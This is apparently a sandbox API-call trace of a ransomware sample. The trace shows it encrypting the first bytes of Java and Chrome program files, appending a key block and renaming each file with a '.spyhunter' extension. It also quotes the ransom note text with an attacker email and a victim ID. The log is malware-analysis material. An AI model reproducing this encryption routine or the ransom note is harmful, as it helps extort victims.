lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll.spyhunter")) returned 1 [0175.397] GetProcessHeap () returned 0x2c0000 [0175.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.397] GetProcessHeap () returned 0x2c0000 [0175.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.397] GetProcessHeap () returned 0x2c0000 [0175.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f4c0 | out: hHeap=0x2c0000) returned 1 [0175.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3d8 | out: pbBuffer=0x25ce3d8) returned 1 [0175.397] GetProcessHeap () returned 0x2c0000 [0175.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3d0*=0x30) returned 1 [0175.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.398] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll") returned 54 [0175.398] StrStrW (lpFirst="dt_socket.dll", lpSrch=".txt") returned 0x0 [0175.398] GetProcessHeap () returned 0x2c0000 [0175.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.398] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce394*=0x2800, lpOverlapped=0x0) returned 1 [0175.400] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.400] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce394*=0x2800, lpOverlapped=0x0) returned 1 [0175.400] GetProcessHeap () returned 0x2c0000 [0175.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.400] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.400] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x25ce3d4*, lpNumberOfBytesWritten=0x25ce394*=0x4, lpOverlapped=0x0) returned 1 [0175.401] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce394*=0x30, lpOverlapped=0x0) returned 1 [0175.401] CloseHandle (hObject=0xb0) returned 1 [0175.401] GetProcessHeap () returned 0x2c0000 [0175.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.401] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll.spyhunter") returned 64 [0175.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll.spyhunter")) returned 1 [0175.402] GetProcessHeap () returned 0x2c0000 [0175.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.402] GetProcessHeap () returned 0x2c0000 [0175.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.402] GetProcessHeap () returned 0x2c0000 [0175.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1e98 | out: hHeap=0x2c0000) returned 1 [0175.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3d8 | out: pbBuffer=0x25ce3d8) returned 1 [0175.402] GetProcessHeap () returned 0x2c0000 [0175.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3d0*=0x30) returned 1 [0175.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.403] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll") returned 53 [0175.403] StrStrW (lpFirst="dt_shmem.dll", lpSrch=".txt") returned 0x0 [0175.403] GetProcessHeap () returned 0x2c0000 [0175.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.404] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce394*=0x2800, lpOverlapped=0x0) returned 1 [0175.466] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.466] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce394*=0x2800, lpOverlapped=0x0) returned 1 [0175.467] GetProcessHeap () returned 0x2c0000 [0175.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.467] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.467] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x25ce3d4*, lpNumberOfBytesWritten=0x25ce394*=0x4, lpOverlapped=0x0) returned 1 [0175.491] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce394, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce394*=0x30, lpOverlapped=0x0) returned 1 [0175.491] CloseHandle (hObject=0xb0) returned 1 [0175.492] GetProcessHeap () returned 0x2c0000 [0175.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.492] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll.spyhunter") returned 63 [0175.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll.spyhunter")) returned 1 [0175.492] GetProcessHeap () returned 0x2c0000 [0175.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.492] GetProcessHeap () returned 0x2c0000 [0175.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.493] GetProcessHeap () returned 0x2c0000 [0175.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1de0 | out: hHeap=0x2c0000) returned 1 [0175.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.493] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0175.493] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce307*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce430, lpOverlapped=0x0 | out: lpBuffer=0x25ce307*, lpNumberOfBytesWritten=0x25ce430*=0x127, lpOverlapped=0x0) returned 1 [0175.494] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0175.494] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce430, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce430*=0x2ac, lpOverlapped=0x0) returned 1 [0175.495] CloseHandle (hObject=0xb0) returned 1 [0175.495] GetProcessHeap () returned 0x2c0000 [0175.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e045e8 | out: hHeap=0x2c0000) returned 1 [0175.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3d0 | out: pbBuffer=0x25ce3d0) returned 1 [0175.495] GetProcessHeap () returned 0x2c0000 [0175.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3c8*=0x30) returned 1 [0175.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.497] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt") returned 58 [0175.497] StrStrW (lpFirst="Xusage.txt", lpSrch=".txt") returned=".txt" [0175.497] lstrlenW (lpString=".txt") returned 4 [0175.497] lstrlenW (lpString=".txt") returned 4 [0175.497] GetProcessHeap () returned 0x2c0000 [0175.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.497] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce38c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce38c*=0x5a7, lpOverlapped=0x0) returned 1 [0175.498] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.498] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x5a7, lpNumberOfBytesWritten=0x25ce38c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce38c*=0x5a7, lpOverlapped=0x0) returned 1 [0175.499] GetProcessHeap () returned 0x2c0000 [0175.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.499] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.499] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce38c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3cc*, lpNumberOfBytesWritten=0x25ce38c*=0x4, lpOverlapped=0x0) returned 1 [0175.499] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce38c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce38c*=0x30, lpOverlapped=0x0) returned 1 [0175.499] CloseHandle (hObject=0xb0) returned 1 [0175.499] GetProcessHeap () returned 0x2c0000 [0175.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.499] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.spyhunter") returned 68 [0175.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt.spyhunter")) returned 1 [0175.500] GetProcessHeap () returned 0x2c0000 [0175.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.500] GetProcessHeap () returned 0x2c0000 [0175.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.500] GetProcessHeap () returned 0x2c0000 [0175.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f280 | out: hHeap=0x2c0000) returned 1 [0175.500] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3c8 | out: pbBuffer=0x25ce3c8) returned 1 [0175.500] GetProcessHeap () returned 0x2c0000 [0175.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.500] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3c0*=0x30) returned 1 [0175.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.501] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll") returned 55 [0175.501] StrStrW (lpFirst="jvm.dll", lpSrch=".txt") returned 0x0 [0175.501] GetProcessHeap () returned 0x2c0000 [0175.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.501] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce384*=0x2800, lpOverlapped=0x0) returned 1 [0175.579] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.581] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce384*=0x2800, lpOverlapped=0x0) returned 1 [0175.581] GetProcessHeap () returned 0x2c0000 [0175.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.581] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.581] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x25ce3c4*, lpNumberOfBytesWritten=0x25ce384*=0x4, lpOverlapped=0x0) returned 1 [0175.583] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce384*=0x30, lpOverlapped=0x0) returned 1 [0175.583] CloseHandle (hObject=0xb0) returned 1 [0175.624] GetProcessHeap () returned 0x2c0000 [0175.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.624] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll.spyhunter") returned 65 [0175.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll.spyhunter")) returned 1 [0175.628] GetProcessHeap () returned 0x2c0000 [0175.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.628] GetProcessHeap () returned 0x2c0000 [0175.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.628] GetProcessHeap () returned 0x2c0000 [0175.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bc08 | out: hHeap=0x2c0000) returned 1 [0175.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3c8 | out: pbBuffer=0x25ce3c8) returned 1 [0175.629] GetProcessHeap () returned 0x2c0000 [0175.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.629] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3c0*=0x30) returned 1 [0175.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.630] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll") returned 121 [0175.630] StrStrW (lpFirst="widevinecdm.dll", lpSrch=".txt") returned 0x0 [0175.630] GetProcessHeap () returned 0x2c0000 [0175.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.630] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce384*=0x2800, lpOverlapped=0x0) returned 1 [0175.636] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.636] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce384*=0x2800, lpOverlapped=0x0) returned 1 [0175.636] GetProcessHeap () returned 0x2c0000 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.636] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.637] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x25ce3c4*, lpNumberOfBytesWritten=0x25ce384*=0x4, lpOverlapped=0x0) returned 1 [0175.709] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce384, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce384*=0x30, lpOverlapped=0x0) returned 1 [0175.709] CloseHandle (hObject=0xb0) returned 1 [0175.723] GetProcessHeap () returned 0x2c0000 [0175.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.723] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.spyhunter") returned 131 [0175.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.spyhunter")) returned 1 [0175.725] GetProcessHeap () returned 0x2c0000 [0175.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.725] GetProcessHeap () returned 0x2c0000 [0175.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.725] GetProcessHeap () returned 0x2c0000 [0175.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b068 | out: hHeap=0x2c0000) returned 1 [0175.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3c0 | out: pbBuffer=0x25ce3c0) returned 1 [0175.725] GetProcessHeap () returned 0x2c0000 [0175.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3b8*=0x30) returned 1 [0175.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.729] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak") returned 81 [0175.729] StrStrW (lpFirst="vi.pak", lpSrch=".txt") returned 0x0 [0175.729] GetProcessHeap () returned 0x2c0000 [0175.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.729] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce37c*=0x2800, lpOverlapped=0x0) returned 1 [0175.742] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.742] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce37c*=0x2800, lpOverlapped=0x0) returned 1 [0175.742] GetProcessHeap () returned 0x2c0000 [0175.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.742] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 